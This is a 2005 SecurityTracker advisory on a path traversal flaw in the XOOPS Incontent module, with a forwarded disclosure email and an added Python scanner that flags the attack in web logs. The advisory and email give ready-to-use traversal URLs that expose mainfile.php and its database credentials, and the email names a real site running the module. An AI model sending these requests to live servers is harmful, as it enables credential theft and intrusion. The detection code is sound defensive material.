SecurityTracker.com
Category:  Application (Forum/Board/Portal)  >  XOOPS Incontent Module
Vendors:  Xoops.sourceforge.net
XOOPS Incontent Module Discloses PHP File Contents to Remote Users
SecurityTracker Alert ID:  1013034
SecurityTracker URL:  http://securitytracker.com/id?1013034
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Jan 28 2005
Impact:  Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Description:  A vulnerability was reported in the XOOPS third party Incontent module. A remote user can view the content of PHP files.

Lostmon forwarded a report of a vulnerability in the Incontent module. The module does not properly validate user-supplied input in the 'url' parameter. A remote user can view the contents of 'mainfile.php' with the following type of URL:

http://[target]/modules/incontent/index.php?op=aff&option=0&url=../../../mainfile.php

Other PHP files can be viewed, as shown in the following URLs:

http://[target]/modules/incontent/index.php?op=aff&option=0&url=../../../index.php

http://[target]/modules/incontent/index.php?op=aff&option=0&url=../../../header.php

Impact:  A remote user can view the contents of PHP files on the target server.
Solution:  A patch is reportedly available at:

http://www.e-xoops.ru/modules/mydownloads/visit.php?lid=330

Cause:  Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  Lostmon <lostmon@gmail.com>
Message History:   None.
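The traversal pattern described above, seen from the defender's side: an added example (not part of the advisory or of the XOOPS module) that scans Apache-style access log lines for requests to the Incontent front controller whose 'url' parameter escapes its directory or names a .php source file. The log lines, timestamps and IP addresses are constructed for the example.

```python
"""Flag requests matching the XOOPS Incontent 'url' traversal pattern
described in this advisory, over constructed Apache combined log lines."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample log lines (not captured from any real server).
SAMPLE_LOG = """\
203.0.113.5 - - [28/Jan/2005:10:01:02 +0100] "GET /modules/incontent/index.php?op=aff&option=0&url=consult.html HTTP/1.1" 200 1832
203.0.113.5 - - [28/Jan/2005:10:01:09 +0100] "GET /modules/incontent/index.php?op=aff&option=0&url=../../../mainfile.php HTTP/1.1" 200 4096
198.51.100.7 - - [28/Jan/2005:10:02:11 +0100] "GET /modules/incontent/index.php?op=aff&option=0&url=..%2F..%2F..%2Fheader.php HTTP/1.1" 200 2210
198.51.100.7 - - [28/Jan/2005:10:03:00 +0100] "GET /modules/news/index.php?storyid=12 HTTP/1.1" 200 5120
"""

# Minimal combined-log parser: client IP, timestamp, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def is_incontent_traversal(target: str) -> bool:
    """True if the request hits the Incontent front controller with a 'url'
    value that climbs out of its directory (plain or percent-encoded '..')
    or names a .php file, as in the advisory's example URLs."""
    parts = urlsplit(target)
    if not parts.path.endswith("/modules/incontent/index.php"):
        return False
    for raw in parse_qs(parts.query, keep_blank_values=True).get("url", []):
        # parse_qs already decoded once; decode again to catch %252e%252e.
        value = unquote(raw).replace("\\", "/")
        if ".." in value.split("/") or value.lower().endswith(".php"):
            return True
    return False


def scan_log(text: str):
    """Return (ip, timestamp, target) tuples for lines matching the pattern."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_incontent_traversal(m["target"]):
            hits.append((m["ip"], m["ts"], m["target"]))
    return hits


if __name__ == "__main__":
    for ip, ts, target in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} {target}")
```

The check is deliberately narrow to the 'url' parameter of this module's index.php so it can be dropped into a log review without flagging ordinary XOOPS traffic.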


Source Message Contents

Date:  Thu, 27 Jan 2005 14:19:44 +0100
From:  Lostmon <lostmon@gmail.com>
Subject:  Fwd: INCONTENT SECURITY ALERT!!

 
 
hello !!!
 
i receive this email yesterday 
 
Sincerely,
Lostmon
 
 
---------- Forwarded message ----------
From: webmaster@------.org <webmaster@------.org>
Date: Wed, 26 Jan 2005 18:02:56 +0100
Subject: INCONTENT SECURITY ALERT!!
To: lostmon@gmail.com
 
 
I just received the following information from Larok (Webmaster at the
RUSSIAN SUPPORT SITE) regarding the INCONTENT MODULE
 
If you are using INCONTENT, YOU WILL FIND A SECURITY FIX IN THIS INFORMATION TOO:
 
info from Larok is here :
Hello.
 
The Incontent module has a big security bug.
 
With this bug a hacker can see all data in mainfile.php & other *.php
portal files.
 
All database data can be stolen.
 
How it works:
 
Just a simple search in Google for sites that use the incontent module; I found
one of them:
 
http://www.dotcomdesigns.net/modules/incontent/
 
To view incontent files we use a link like:
 
http://[target]/modules/incontent/index.php?op=aff&option=0&url=consult.html
 
We can easily look at all database data, password, username and other by this
link in html:
 
http://[target]/modules/incontent/index.php?op=aff&option=0&url=../../../mainfile.php
 
And different *.php files by a link like:
 
http://[target]/modules/incontent/index.php?op=aff&option=0&url=../../../index.php
 
http://[target]/modules/incontent/index.php?op=aff&option=0&url=../../../header.php
 
Patch for this error here:
http://www.e-xoops.ru/modules/mydownloads/visit.php?lid=330
(Closed for non-registered)
 
Also it must work on xoops portals where the webmaster installed this module.
Like this one:
 
http://[target]/modules/incontent/index.php?op=aff&option=0&url=../../../mainfile.php
 
Have a nice day.
 
 
-- 
Curiosity is what keeps the mind moving....
 


Copyright 2005, SecurityGlobal.net LLC